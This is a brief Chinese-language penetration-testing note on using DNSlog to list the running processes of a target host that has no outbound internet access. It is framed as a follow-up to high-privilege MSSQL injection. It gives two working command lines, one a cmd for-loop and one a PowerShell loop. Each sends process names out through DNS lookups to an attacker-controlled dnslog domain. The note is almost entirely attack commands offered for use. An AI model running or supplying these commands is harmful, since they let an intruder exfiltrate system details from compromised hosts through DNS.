利用dnslog探测目标进程
2021年12月30日常用于mssql高权限注入目标主机不岀网
利用cmdshell for循环实现
for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.xxxx.dnslog.cn >nul
用powershell foreach循环实现
先导出进程列表 powershell -c "Get-Process | select processname > 1.txt" powershell -c "Get-Content .\1.txt | Sort-Object -Unique | ForEach-Object {if($_ -match $regex){$b=$_.trim();ping -n 1 $b'.xxxx.check.dns1.top.'} }"